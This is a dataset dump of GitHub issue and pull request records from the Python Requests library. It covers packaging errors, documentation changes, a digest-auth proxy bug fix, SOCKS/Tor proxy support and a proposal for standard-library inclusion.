url
stringlengths
50
53
repository_url
stringclasses
1 value
labels_url
stringlengths
64
67
comments_url
stringlengths
59
62
events_url
stringlengths
57
60
html_url
stringlengths
38
43
id
int64
597k
2.65B
node_id
stringlengths
18
32
number
int64
1
6.83k
title
stringlengths
1
296
user
dict
labels
listlengths
0
5
state
stringclasses
2 values
locked
bool
2 classes
assignee
dict
assignees
listlengths
0
4
milestone
dict
comments
int64
0
211
created_at
stringlengths
20
20
updated_at
stringlengths
20
20
closed_at
stringlengths
20
20
author_association
stringclasses
3 values
active_lock_reason
stringclasses
4 values
body
stringlengths
0
65.6k
closed_by
dict
reactions
dict
timeline_url
stringlengths
59
62
performed_via_github_app
null
state_reason
stringclasses
3 values
draft
bool
2 classes
pull_request
dict
is_pull_request
bool
2 classes
issue_comments
listlengths
0
30
https://api.github.com/repos/psf/requests/issues/2430
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2430/labels{/name}
https://api.github.com/repos/psf/requests/issues/2430/comments
https://api.github.com/repos/psf/requests/issues/2430/events
https://github.com/psf/requests/issues/2430
55,872,428
MDU6SXNzdWU1NTg3MjQyOA==
2,430
Upgrade/install of 2.5.0 fails on Fedora via yum
{ "avatar_url": "https://avatars.githubusercontent.com/u/10137?v=4", "events_url": "https://api.github.com/users/ghost/events{/privacy}", "followers_url": "https://api.github.com/users/ghost/followers", "following_url": "https://api.github.com/users/ghost/following{/other_user}", "gists_url": "https://api.github.com/users/ghost/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ghost", "id": 10137, "login": "ghost", "node_id": "MDQ6VXNlcjEwMTM3", "organizations_url": "https://api.github.com/users/ghost/orgs", "received_events_url": "https://api.github.com/users/ghost/received_events", "repos_url": "https://api.github.com/users/ghost/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ghost/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ghost/subscriptions", "type": "User", "url": "https://api.github.com/users/ghost", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-29T08:51:22Z
2021-09-08T20:00:50Z
2015-01-29T10:34:10Z
NONE
resolved
Running transaction check Running transaction test Transaction test succeeded Running transaction (shutdown inhibited) Updating : python-requests-2.5.0-3.fc21.noarch 1/2 Error unpacking rpm package python-requests-2.5.0-3.fc21.noarch _error: unpacking of archive failed on file /usr/lib/python2.7/site-packages/requests/packages/urllib3: cpio: rename_ Verifying : python-requests-2.5.0-3.fc21.noarch 1/2 python-requests-2.3.0-3.fc21.noarch was supposed to be removed but is not! Verifying : python-requests-2.3.0-3.fc21.noarch 2/2 Failed: python-requests.noarch 0:2.3.0-3.fc21 python-requests.noarch 0:2.5.0-3.fc21
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2430/reactions" }
https://api.github.com/repos/psf/requests/issues/2430/timeline
null
completed
null
null
false
[ "v 2.3 can be installed/uninstalled\nv2.5 cann't be installed/upgraded-to\nWorks fine from pip\n", "We do not package or build the Red Hat packages. Please take this up with downstream.\n", "This seems to be caused by a conflict when the package is already installed via pip.\nSee https://bugzilla.redhat.com/show_bug.cgi?id=1177479#c4\n\nOne solution is to \"pip uninstall requests\". Or upgrade via pip instead of installing via rpm.\n" ]
https://api.github.com/repos/psf/requests/issues/2429
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2429/labels{/name}
https://api.github.com/repos/psf/requests/issues/2429/comments
https://api.github.com/repos/psf/requests/issues/2429/events
https://github.com/psf/requests/pull/2429
55,760,918
MDExOlB1bGxSZXF1ZXN0MjgxOTYyNTE=
2,429
Update support documentation to be more accurate
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "fad8c7", "default": false, "description": null, "id": 136616769, "name": "Documentation", "node_id": "MDU6TGFiZWwxMzY2MTY3Njk=", "url": "https://api.github.com/repos/psf/requests/labels/Documentation" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
null
12
2015-01-28T14:16:25Z
2021-09-08T08:01:05Z
2015-03-04T22:20:33Z
CONTRIBUTOR
resolved
We were missing instructions to report security vulnerabilities, and all of the documentation referred to Kenneth as the only source of support. We were also missing a link to StackOverflow.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2429/reactions" }
https://api.github.com/repos/psf/requests/issues/2429/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2429.diff", "html_url": "https://github.com/psf/requests/pull/2429", "merged_at": "2015-03-04T22:20:33Z", "patch_url": "https://github.com/psf/requests/pull/2429.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2429" }
true
[ "One note. =D\n", "Added you @Lukasa and added a bit more detail about vulnerability reporting.\n", "This looks good.\n- I might duplicate the vulnerability reporting text in a top-level page called \"Security\". Basically you want to make it really easy for anyone googling \"python requests security\" to find the page and if it's under a page heading called Support it's easier for Google/users to miss it\n- I might break up the text into multiple paragraphs, as [people don't read on the Internet](http://www.nngroup.com/articles/how-users-read-on-the-web/), but they tend to fixate on the left edge of text (eg the beginnings of paragraphs). \n", "> I might duplicate the vulnerability reporting text in a top-level page called \"Security\". Basically you want to make it really easy for anyone googling \"python requests security\" to find the page and if it's under a page heading called Support it's easier for Google/users to miss it\n\n\"Security\" is going to cause more search problems than not. I have a feeling people will be searching for that in relation to verifying/securing connections. I'm not adverse to this being a separate page (in fact I'd prefer it) but this will do for now.\n\n> I might break up the text into multiple paragraphs, as people don't read on the Internet, but they tend to fixate on the left edge of text (eg the beginnings of paragraphs). \n\nDone\n", "@Lukasa ping ;)\n", "@sigmavirus24 Is it worth adding GPG key fingerprints for you and I?\n", "Let me find mine, can you add yours as a comment?\n", "Actually, I'll push mine, you can update yours since this is a branch on requests proper that we can both push to.\n", "My key is there now. =)\n", "Good to merge?\n", ":+1:\n", ":cake: :sparkles: :cake: \n" ]
https://api.github.com/repos/psf/requests/issues/2428
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2428/labels{/name}
https://api.github.com/repos/psf/requests/issues/2428/comments
https://api.github.com/repos/psf/requests/issues/2428/events
https://github.com/psf/requests/pull/2428
55,613,958
MDExOlB1bGxSZXF1ZXN0MjgxMDU4OTM=
2,428
Docs fixed
{ "avatar_url": "https://avatars.githubusercontent.com/u/1381173?v=4", "events_url": "https://api.github.com/users/sepulchered/events{/privacy}", "followers_url": "https://api.github.com/users/sepulchered/followers", "following_url": "https://api.github.com/users/sepulchered/following{/other_user}", "gists_url": "https://api.github.com/users/sepulchered/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sepulchered", "id": 1381173, "login": "sepulchered", "node_id": "MDQ6VXNlcjEzODExNzM=", "organizations_url": "https://api.github.com/users/sepulchered/orgs", "received_events_url": "https://api.github.com/users/sepulchered/received_events", "repos_url": "https://api.github.com/users/sepulchered/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sepulchered/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sepulchered/subscriptions", "type": "User", "url": "https://api.github.com/users/sepulchered", "user_view_type": "public" }
[]
closed
true
null
[]
null
6
2015-01-27T12:53:10Z
2021-09-08T09:01:00Z
2015-01-27T18:22:35Z
NONE
resolved
Moved "Custom Headers" part after "More complicated POST requests" and before "POST a Multipart-Encoded File" in quickstart doc for adding headers is mentioned in the last one.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2428/reactions" }
https://api.github.com/repos/psf/requests/issues/2428/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2428.diff", "html_url": "https://github.com/psf/requests/pull/2428", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2428.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2428" }
true
[ "I think the correct fix is actually to come up with an example that doesn't require the `data` parameter. Custom headers should come before anything with 'more complicated' in the title. =)\n", "I see, I just decided that it would be enough because custom headers are not mentioned in \"More complicated POST requests\".\n", "Yeah, I can see that, but I think headers are the simpler topic. If you feel strongly about it though I can merge as-is and consider changing it later. =)\n", "Moved it back and set example to use only headers kwarg without data. :)\n", "Sorry for not being careful, now it finally seems like I fixed everything that was needed.\n", "I think i prefer the existing form of this. Thank you, though!\n" ]
https://api.github.com/repos/psf/requests/issues/2427
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2427/labels{/name}
https://api.github.com/repos/psf/requests/issues/2427/comments
https://api.github.com/repos/psf/requests/issues/2427/events
https://github.com/psf/requests/pull/2427
55,436,588
MDExOlB1bGxSZXF1ZXN0MjgwMDA4MDA=
2,427
Bug fix: field uri in digest authentication should not be empty when enc...
{ "avatar_url": "https://avatars.githubusercontent.com/u/1176856?v=4", "events_url": "https://api.github.com/users/luozhaoyu/events{/privacy}", "followers_url": "https://api.github.com/users/luozhaoyu/followers", "following_url": "https://api.github.com/users/luozhaoyu/following{/other_user}", "gists_url": "https://api.github.com/users/luozhaoyu/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/luozhaoyu", "id": 1176856, "login": "luozhaoyu", "node_id": "MDQ6VXNlcjExNzY4NTY=", "organizations_url": "https://api.github.com/users/luozhaoyu/orgs", "received_events_url": "https://api.github.com/users/luozhaoyu/received_events", "repos_url": "https://api.github.com/users/luozhaoyu/repos", "site_admin": false, "starred_url": "https://api.github.com/users/luozhaoyu/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/luozhaoyu/subscriptions", "type": "User", "url": "https://api.github.com/users/luozhaoyu", "user_view_type": "public" }
[]
closed
true
null
[]
null
6
2015-01-26T00:13:59Z
2021-09-08T08:00:53Z
2015-04-06T15:19:15Z
CONTRIBUTOR
resolved
...ounter http redirections. https://github.com/kennethreitz/requests/issues/2426
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2427/reactions" }
https://api.github.com/repos/psf/requests/issues/2427/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2427.diff", "html_url": "https://github.com/psf/requests/pull/2427", "merged_at": "2015-04-06T15:19:15Z", "patch_url": "https://github.com/psf/requests/pull/2427.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2427" }
true
[ "I haven't read this yet, and I'm certain it really is this simple, but I want to re read the RFC about this regardless to make sure this applies to all cases. I suppose we've never had trouble with this because people were using URIs that had paths when authenticating. It doesn't hurt to be safe though. =)\n\nThanks for your patience @luozhaoyu \n", "@sigmavirus24 Sure! It is rare because I could only reproduce it when use a proxy and encounter a redirect...\n", "I'm comfortable with this. Sorry for the delay @luozhaoyu. I lost track of this.\n\nThoughts @Lukasa?\n", "Fine by me. =)\n", "Thanks @luozhaoyu \n", "@sigmavirus24 You're welcome!\n" ]
https://api.github.com/repos/psf/requests/issues/2426
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2426/labels{/name}
https://api.github.com/repos/psf/requests/issues/2426/comments
https://api.github.com/repos/psf/requests/issues/2426/events
https://github.com/psf/requests/issues/2426
55,436,121
MDU6SXNzdWU1NTQzNjEyMQ==
2,426
Bug: field "uri" in header["Proxy-Authorization"] should not be empty
{ "avatar_url": "https://avatars.githubusercontent.com/u/1176856?v=4", "events_url": "https://api.github.com/users/luozhaoyu/events{/privacy}", "followers_url": "https://api.github.com/users/luozhaoyu/followers", "following_url": "https://api.github.com/users/luozhaoyu/following{/other_user}", "gists_url": "https://api.github.com/users/luozhaoyu/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/luozhaoyu", "id": 1176856, "login": "luozhaoyu", "node_id": "MDQ6VXNlcjExNzY4NTY=", "organizations_url": "https://api.github.com/users/luozhaoyu/orgs", "received_events_url": "https://api.github.com/users/luozhaoyu/received_events", "repos_url": "https://api.github.com/users/luozhaoyu/repos", "site_admin": false, "starred_url": "https://api.github.com/users/luozhaoyu/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/luozhaoyu/subscriptions", "type": "User", "url": "https://api.github.com/users/luozhaoyu", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2015-01-25T23:58:04Z
2021-09-08T23:05:48Z
2015-04-06T15:19:29Z
CONTRIBUTOR
resolved
#### Issue When I am handling [toolbelt's digest proxy issue](https://github.com/sigmavirus24/requests-toolbelt/issues/53), I find the proxy server rejects my request header: Connection: keep-alive\r\n Proxy-Authorization: Digest username="luozhaoyu", realm="[email protected]", nonce="o3jFVAAAAADwDnHL3X8AABqmXw4AAAAA", uri="", response="9a5d356b4a5bac5473864896bcfdcc69", qop="auth", nc=00000001, cnonce="a681e67b2a3bb034"\r\n Accept-Encoding: gzip, deflate\r\n The problem is because field uri should be "/" rather than "". ([request-uri's definition is in RFC 2616](http://tools.ietf.org/html/rfc2616#section-5.1.2)) #### Bug reproduce It is funny to find the bug. Set up a digest auth proxy, `r = requests.get(url, proxies=proxies, auth=auth, allow_redirects=True)` url is http://bing.cn/ (this is a typo), there will be a HTTP 301 to http://www.rz.com/, client would try to access http://www.rz.com directly, but the proxy would reject and ask for user/password. However, the automatic redirect's url parse result will be `ParseResult(scheme='http', netloc='www.rz.com', path='', params='', query='', fragment='')` The path is empty, and will result in authentication failure. #### Solution is one line: add a line in `auth.py` line 110: `path = "/" if not path else path` I will create a pull request later.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2426/reactions" }
https://api.github.com/repos/psf/requests/issues/2426/timeline
null
completed
null
null
false
[ "Closed by #2427.\n" ]
https://api.github.com/repos/psf/requests/issues/2425
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2425/labels{/name}
https://api.github.com/repos/psf/requests/issues/2425/comments
https://api.github.com/repos/psf/requests/issues/2425/events
https://github.com/psf/requests/issues/2425
55,425,272
MDU6SXNzdWU1NTQyNTI3Mg==
2,425
SOCKS proxy support
{ "avatar_url": "https://avatars.githubusercontent.com/u/6208662?v=4", "events_url": "https://api.github.com/users/jorenham/events{/privacy}", "followers_url": "https://api.github.com/users/jorenham/followers", "following_url": "https://api.github.com/users/jorenham/following{/other_user}", "gists_url": "https://api.github.com/users/jorenham/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/jorenham", "id": 6208662, "login": "jorenham", "node_id": "MDQ6VXNlcjYyMDg2NjI=", "organizations_url": "https://api.github.com/users/jorenham/orgs", "received_events_url": "https://api.github.com/users/jorenham/received_events", "repos_url": "https://api.github.com/users/jorenham/repos", "site_admin": false, "starred_url": "https://api.github.com/users/jorenham/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/jorenham/subscriptions", "type": "User", "url": "https://api.github.com/users/jorenham", "user_view_type": "public" }
[]
closed
true
null
[]
null
8
2015-01-25T19:01:05Z
2021-09-05T00:06:58Z
2015-01-25T19:14:56Z
NONE
resolved
I would like to request support for Socket Secure protocol. There exists a fork (https://github.com/dvska/requesocks) with this capability, but it is limited (python 2 only). Currently the `AssertionError: Not supported proxy scheme socks5` is thrown when attempting to connect to a socks5 proxy. A quick Google search (https://www.google.nl/search?q=socks+proxy+list) illustrates the popularity of the protocol. Even Tor and I2P use it.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2425/reactions" }
https://api.github.com/repos/psf/requests/issues/2425/timeline
null
completed
null
null
false
[ "https://github.com/kennethreitz/requests/issues?q=is%3Aissue+socks+is%3Aclosed would have been a good search before opening this issue as well.\n", "https://github.com/kennethreitz/requests/pull/478 was the only effort anyone made towards including this support in requests over 2 years ago. As of now, https://github.com/shazow/urllib3/pull/486 is still in progress. Until that is finished there is nothing we can do about supporting socks proxies. \n", "If I do \n\n``` python\n#proxy\n # SOCKS5 proxy for HTTP/HTTPS\n proxies = {\n 'http' : \"socks5://myproxy:9191\",\n 'https' : \"socks5://myproxy:9191\"\n }\n\n #headers\n headers = {\n\n }\n\n url='http://icanhazip.com/'\n res = requests.get(url, headers=headers, proxies=proxies)\n```\n\nI get `AssertionError: Not supported proxy scheme socks5`\n", "@loretoparisi make sure you have the latest version of `requests` and also install `PySocks`. here is an example of using Tor (via a socks5 proxy) with requests: https://github.com/AlJohri/python-tor-examples\n", "How can i open .onion domains with this code?\r\nNow i getting error:\r\n\r\n```\r\nrequests.exceptions.ConnectionError: HTTPConnectionPool(host='zqktlwi4fecvo6ri.onion', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fd35ba09b10>: Failed to establish a new connection: [Errno -2] Name or service not known',))\r\n```", "You need to use the `socks5h` scheme ([stackoverflow](https://stackoverflow.com/questions/42971622/fetching-a-onion-domain-with-requests)):\r\n\r\nhttps://github.com/requests/requests/blob/e3f89bf23c53b98593e4248054661472aacac820/requests/packages/urllib3/contrib/socks.py#L155-L160\r\n\r\nExample:\r\n\r\n```python\r\nimport requests\r\n\r\nproxies = {\r\n 'http': 'socks5h://127.0.0.1:9050',\r\n 'https': 'socks5h://127.0.0.1:9050'\r\n}\r\n\r\nresponse = requests.get('http://nzxj65x32vh2fkhk.onion/all', proxies=proxies)\r\nprint(response.text)\r\n\r\nresponse = requests.get('http://zqktlwi4fecvo6ri.onion/', proxies=proxies)\r\nprint(response.text)\r\n```\r\n\r\nYou'll notice that the first `.onion` link works while the second (your link) 403s. This is the most probably explanation:\r\n- https://www.reddit.com/r/TOR/comments/t04z2/tor_and_403_errors/\r\n- https://tor.stackexchange.com/questions/4923/tor-and-error-403-forbidden", "Wow, it's work, but on URL http://zqktlwi4fecvo6ri.onion (Hidden Wiki) i'm getting 403.\r\nThanks, next i'll try to understanding by myself", "> @loretoparisi make sure you have the latest version of `requests` and also install `PySocks`. here is an example of using Tor (via a socks5 proxy) with requests: https://github.com/AlJohri/python-tor-examples\r\n\r\nThanks ! Pysocks is what I didn't install, but there is another annoying exception, could you help me?\r\n```\r\nSOCKSHTTPSConnectionPool(host='www.pinterest.com', port=443): \r\nMax retries exceeded with url: /search/pins/q=poster%20food&rs=typed&term_meta[]=poster%7Ctyped&term_meta[]=food%7Ctyped\r\n(Caused by SSLError(SSLError(\"bad handshake: SysCallError(-1, 'Unexpected EOF')\",),))\r\n```" ]
https://api.github.com/repos/psf/requests/issues/2424
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2424/labels{/name}
https://api.github.com/repos/psf/requests/issues/2424/comments
https://api.github.com/repos/psf/requests/issues/2424/events
https://github.com/psf/requests/issues/2424
55,422,175
MDU6SXNzdWU1NTQyMjE3NQ==
2,424
Consider Requests' Inclusion in Python 3.5's Standard Library
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
[ { "color": "f7c6c7", "default": false, "description": null, "id": 167537670, "name": "Propose Close", "node_id": "MDU6TGFiZWwxNjc1Mzc2NzA=", "url": "https://api.github.com/repos/psf/requests/labels/Propose%20Close" } ]
closed
true
null
[]
null
42
2015-01-25T17:17:59Z
2021-09-08T22:00:48Z
2015-05-03T15:08:10Z
CONTRIBUTOR
resolved
There's a lot to this, but I'll keep it simple... Would the Python community, as a whole, benefit from Requests being added into the standard library? Would love to hear your thoughts and opinions on the subject!
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 31, "-1": 0, "confused": 0, "eyes": 0, "heart": 10, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 41, "url": "https://api.github.com/repos/psf/requests/issues/2424/reactions" }
https://api.github.com/repos/psf/requests/issues/2424/timeline
null
completed
null
null
false
